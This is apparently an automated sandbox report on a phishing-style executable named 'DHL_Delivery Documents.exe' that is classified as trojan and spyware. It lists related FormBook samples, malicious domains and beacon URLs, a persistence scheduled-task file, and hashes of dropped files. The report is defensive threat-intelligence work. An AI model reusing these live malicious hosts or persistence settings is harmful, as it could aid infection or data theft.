                      Number of analysed new started processes analysed:19
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:DHL_Delivery Documents.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@23/16@7/2
                      EGA Information:
                      • Successful, ratio: 83.3%
                      HCA Information:
                      • Successful, ratio: 96%
                      • Number of executed functions: 121
                      • Number of non-executed functions: 315
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target OoIHIwIlaOHZFTFWeSHYCjEJ.exe, PID 6460 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: DHL_Delivery Documents.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      14:27:44API Interceptor1x Sleep call for process: DHL_Delivery Documents.exe modified
                      14:27:47API Interceptor62x Sleep call for process: powershell.exe modified
                      14:27:52API Interceptor1x Sleep call for process: YybGLWQSx.exe modified
                      14:29:20API Interceptor46x Sleep call for process: setx.exe modified
                      20:27:49Task SchedulerRun new task: YybGLWQSx path: C:\Users\user\AppData\Roaming\YybGLWQSx.exe

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      172.67.214.17purchase list.exeGet hashmaliciousFormBookBrowse
                      • www.alexbruma.com/0m8b/
                      vi3VzdBK4R.exeGet hashmaliciousFormBookBrowse
                      • www.alexbruma.com/mg0g/?H6e0=TZtAOU2zJBKbLgvE31Lcbs4Eo3wL9fTDPKw5qNaDLWK8osbI5ENSognOQFqpGWvli6GRjykTFTPiykSEfCfGWVetp6XhB200JQ==&nBN=u8MPgxf
                      AWB_doc....exeGet hashmaliciousFormBookBrowse
                      • www.alexbruma.com/s6sf/?zj=oZPW66qys/L3lzC8hpDr2IDUkOMkd7CWz/4gMASGPBshx+mEukL9f9nucg4I2FAaIQJF7ODFUU4ygmilgfYhcA8EhXnvZwEh9g==&BHBl=RL1h7LzxfTPX
                      CV.docGet hashmaliciousFormBookBrowse
                      • www.alexbruma.com/mg0g/?G2=TZtAOU2zJBKbLgvHv06radoliSp/pM7DPKw5qNaDLWK8osbI5ENSukyfV0auBUHllKHlpSsKBSD+iUCyfiSnY1mmmvLkXlFHV0J7QHE=&dz=ovClIV4H5
                      GdqrlAmE3T.exeGet hashmaliciousFormBookBrowse
                      • www.alexbruma.com/mg0g/?svR=k4YlqJ20X2XXs&wPJpe=TZtAOU2zJBKbLgvE31Lcbs4Eo3wL9fTDPKw5qNaDLWK8osbI5ENSognOQFqpGWvli6GRjykTFTPiykSEfCfGY1fjt6H8DEc0DR4MOj4TPbUO
                      AWB_file.exeGet hashmaliciousFormBookBrowse
                      • www.alexbruma.com/s6sf/?T4sdypiP=oZPW66qys/L3lzC9uJCOxPeMgMZfa82Wz/4gMASGPBshx+mEukL9f9nucg4I2FAaIQJF7ODFUU4ygmilgfYhcCJDsGnvZwE96Q==&jzThX=arNh8r3HEB
                      5lFjzZyN2w.exeGet hashmaliciousFormBookBrowse
                      • www.alexbruma.com/mg0g/?Xjt8=_60hC640JhqT&xhWt=TZtAOU2zJBKbLgvHv1KBdd4lsyJ6qs7DPKw5qNaDLWK8osbI5ENSognOQFqpGWvli6GRjykTFTPiykSEfCfFDCDmtMCcDVIRIA==
                      Advice_Ref[GLV626201911].exeGet hashmaliciousFormBookBrowse
                      • www.alexbruma.com/mg0g/?KPZ=10rTHdQ0Yh0&r4RTrBU=TZtAOU2zJBKbLgvE31Lcbs4Eo3wL9fTDPKw5qNaDLWK8osbI5ENSognOQFqpGWvli6GRjykTFTPiykSEfCfFDA2mwP6cDVJOLw==
                      Ss13V8H048.exeGet hashmaliciousFormBookBrowse
                      • www.alexbruma.com/mg0g/?4Vz=Tfmd&eZStEN=TZtAOU2zJBKbLgvHv1KBdd4lsyJ6qs7DPKw5qNaDLWK8osbI5ENSognOQFqpGWvli6GRjykTFTPiykSEfCfFDCDmtMCcDVIRIA==
                      PRICE_LIST_FOR_NEW_QUOTE.EXE.exeGet hashmaliciousFormBookBrowse
                      • www.alexbruma.com/mg0g/?9bDl=HleH_lsx-tgD&-Xctj=TZtAOU2zJBKbLgvE31Lcbs4Eo3wL9fTDPKw5qNaDLWK8osbI5ENSognOQFqpGWvli6GRjykTFTPiykSEfCfGWVetp6XhB200JQ==
                      103.48.135.8AWB...exeGet hashmaliciousFormBookBrowse
                      • www.uzonedich.com/s6sf/?8vAla4Nh=LvF9VdN02DoWyKfOfx3dSOe8aODto9eoDEuEsV2RbL1HgzvB1W2t9FZ1Hem1bbCwYpOQFrg3sTYMGTUkpNmQQFL7TTltSk2lCQ==&ob6xa=aH-HdpTPDfuDKZ7
                      AWB_doc....exeGet hashmaliciousFormBookBrowse
                      • www.uzonedich.com/s6sf/?zj=LvF9VdN02DoWyKfOfx3dSOe8aODto9eoDEuEsV2RbL1HgzvB1W2t9FZ1Hem1bbCwYpOQFrg3sTYMGTUkpNmQQFL7TTltSk2lCQ==&BHBl=RL1h7LzxfTPX
                      AWB_file.exeGet hashmaliciousFormBookBrowse
                      • www.uzonedich.com/s6sf/?T4sdypiP=LvF9VdN02DoWyKfPQR24VJDkeMWWv6qoDEuEsV2RbL1HgzvB1W2t9FZ1Hem1bbCwYpOQFrg3sTYMGTUkpNmQQH+8eCltSk25Fg==&jzThX=arNh8r3HEB

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      www.uzonedich.comAWB...exeGet hashmaliciousFormBookBrowse
                      • 103.48.135.8
                      AWB_doc....exeGet hashmaliciousFormBookBrowse
                      • 103.48.135.8
                      AWB_doc_.exeGet hashmaliciousFormBookBrowse
                      • 156.251.239.100
                      AWB_file.exeGet hashmaliciousFormBookBrowse
                      • 103.48.135.8
                      www.alexbruma.compurchase list.exeGet hashmaliciousFormBookBrowse
                      • 172.67.214.17
                      vi3VzdBK4R.exeGet hashmaliciousFormBookBrowse
                      • 172.67.214.17
                      AWB...exeGet hashmaliciousFormBookBrowse
                      • 104.21.77.252
                      AWB_doc....exeGet hashmaliciousFormBookBrowse
                      • 172.67.214.17
                      CV.docGet hashmaliciousFormBookBrowse
                      • 172.67.214.17
                      BvUGO4AmpJ.exeGet hashmaliciousFormBookBrowse
                      • 104.21.77.252
                      GdqrlAmE3T.exeGet hashmaliciousFormBookBrowse
                      • 172.67.214.17
                      Tr71jqZGPq.exeGet hashmaliciousFormBookBrowse
                      • 104.21.77.252
                      DZJQM6oXkJ.exeGet hashmaliciousFormBookBrowse
                      • 104.21.77.252
                      AWB_file.exeGet hashmaliciousFormBookBrowse
                      • 172.67.214.17

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CLOUDFLARENETUSLHER000698175.xlsGet hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      PO 4500025813.xlsGet hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                      • 104.26.12.205
                      Home Purchase Contract and Property Details.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                      • 188.114.96.3
                      Documents Of DHL -BL- AWB- 8976453410.exeGet hashmaliciousAgentTeslaBrowse
                      • 172.67.74.152
                      Offer Document 24.lnkGet hashmaliciousFormBookBrowse
                      • 23.227.38.74
                      PO 4500025813.xlsGet hashmaliciousUnknownBrowse
                      • 188.114.97.3
                      https://freexxxth.linkGet hashmaliciousUnknownBrowse
                      • 104.21.25.77
                      https://freexxxth.linkGet hashmaliciousUnknownBrowse
                      • 172.67.223.248
                      SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
                      • 188.114.97.9
                      XIAOZHIYUN1-AS-APICIDCNETWORKUSgm7Kudjyws.elfGet hashmaliciousGafgytBrowse
                      • 156.226.218.136
                      byKLI4nzv2.elfGet hashmaliciousMiraiBrowse
                      • 156.234.199.238
                      VxrYNgC0xs.elfGet hashmaliciousMiraiBrowse
                      • 156.226.185.165
                      dwn1cGHIbV.elfGet hashmaliciousMiraiBrowse
                      • 156.234.199.249
                      SecuriteInfo.com.Trojan.KillProc2.23108.29569.31585.exeGet hashmaliciousUnknownBrowse
                      • 23.248.236.58
                      SecuriteInfo.com.FileRepMalware.20155.16240.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 156.226.225.200
                      bPOGt24Mub.elfGet hashmaliciousMiraiBrowse
                      • 156.241.35.34
                      kl7nWo7u71.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 156.241.60.186
                      OPs5j7Yjb8.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 156.254.239.8
                      GjWh3Nar5c.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 156.253.103.137

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_Delivery Documents.exe.log

                      Download File
                      Process:C:\Users\user\Desktop\DHL_Delivery Documents.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YybGLWQSx.exe.log

                      Download File
                      Process:C:\Users\user\AppData\Roaming\YybGLWQSx.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:modified
                      Size (bytes):2232
                      Entropy (8bit):5.380747059108785
                      Encrypted:false
                      SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxvIIwLgZ2KRHWLOug8s
                      MD5:4D3B8C97355CF67072ABECB12613F72B
                      SHA1:07B27BA4FE575BBF9F893F03789AD9B8BC2F8615
                      SHA-256:75FC38CDE708951C1963BB89E8AA6CC82F15F1A261BEACAF1BFD9CF0518BEECD
                      SHA-512:8E47C93144772042865B784300F4528E079615F502A3C5DC6BFDE069880268706B7B3BEE227AD5D9EA0E6A3055EDBC90B39B9E55FE3AD58635493253A210C996
                      Malicious:false
                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05krldvo.z5p.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25hh11fd.v0n.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_af2qolju.lyb.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmht5dpf.3fv.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nj4ihgbw.33q.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qahqzbu1.uyv.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_raktu4te.try.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1c0onn3.poe.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\tmp3106.tmp

                      Download File
                      Process:C:\Users\user\Desktop\DHL_Delivery Documents.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1582
                      Entropy (8bit):5.111419215021226
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt7+xvn:cgergYrFdOFzOzN33ODOiDdKrsuT7yv
                      MD5:6338C1D0E376D49F07488439897B7436
                      SHA1:8FDC6694A1A6305DB3A67E50B4555653B2409392
                      SHA-256:47463889132D6CC2331820FCF92DA614624FF1D4CD8008DC0CC583AA0755C3DC
                      SHA-512:BC49F301B7014A69CC4AD22C650BCD2BBEA096FA2781F0C2BFA99AFD0CEBC58B3AF83FE662A91856D43CB1B525FFEEEDC668B0D15B7C92FED1F8BF5164C12625
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                      C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\YybGLWQSx.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1582
                      Entropy (8bit):5.111419215021226
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt7+xvn:cgergYrFdOFzOzN33ODOiDdKrsuT7yv
                      MD5:6338C1D0E376D49F07488439897B7436
                      SHA1:8FDC6694A1A6305DB3A67E50B4555653B2409392
                      SHA-256:47463889132D6CC2331820FCF92DA614624FF1D4CD8008DC0CC583AA0755C3DC
                      SHA-512:BC49F301B7014A69CC4AD22C650BCD2BBEA096FA2781F0C2BFA99AFD0CEBC58B3AF83FE662A91856D43CB1B525FFEEEDC668B0D15B7C92FED1F8BF5164C12625
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                      C:\Users\user\AppData\Local\Temp\y11J94u5t

                      Download File
                      Process:C:\Windows\SysWOW64\setx.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Roaming\YybGLWQSx.exe

                      Download File
                      Process:C:\Users\user\Desktop\DHL_Delivery Documents.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):939520
                      Entropy (8bit):7.030426163836173
                      Encrypted:false
                      SSDEEP:12288:T83vsUudRAh+fPkiqchEjXHHfYlFajGI8+xKGDPm2c4i1Sp+LrJ26AQ8:T8/kAhGhEj3wlFa6wxTCD4iDL43l
                      MD5:9C930DA2AC186C1F945A7BC74AA491ED
                      SHA1:3B24459060AB8590B7C550D34BD0243CBADE3E2A
                      SHA-256:25BBD4A45D4D02D8BACDF482696505AB302AD8591B5E06DA57481F7098324F9E
                      SHA-512:99C5621F5BB2FD33F780D956D46AB4C61E179AA489FE58F97BC91371E4270EE7676C671C45CB681197CA4C5B17F0B875DD269170E4EF12F4798F1A6BD31FE91C
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 55%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..L...........j... ........@.. ....................................@..................................j..O....................................N..p............................................ ............... ..H............text....J... ...L.................. ..`.rsrc................N..............@..@.reloc...............T..............@..B.................j......H........e...............Y...............................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($....*.0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.S...('...o(...tS.......()..........9.....s.........s*...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...sO...o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........

                      C:\Users\user\AppData\Roaming\YybGLWQSx.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\DHL_Delivery Documents.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
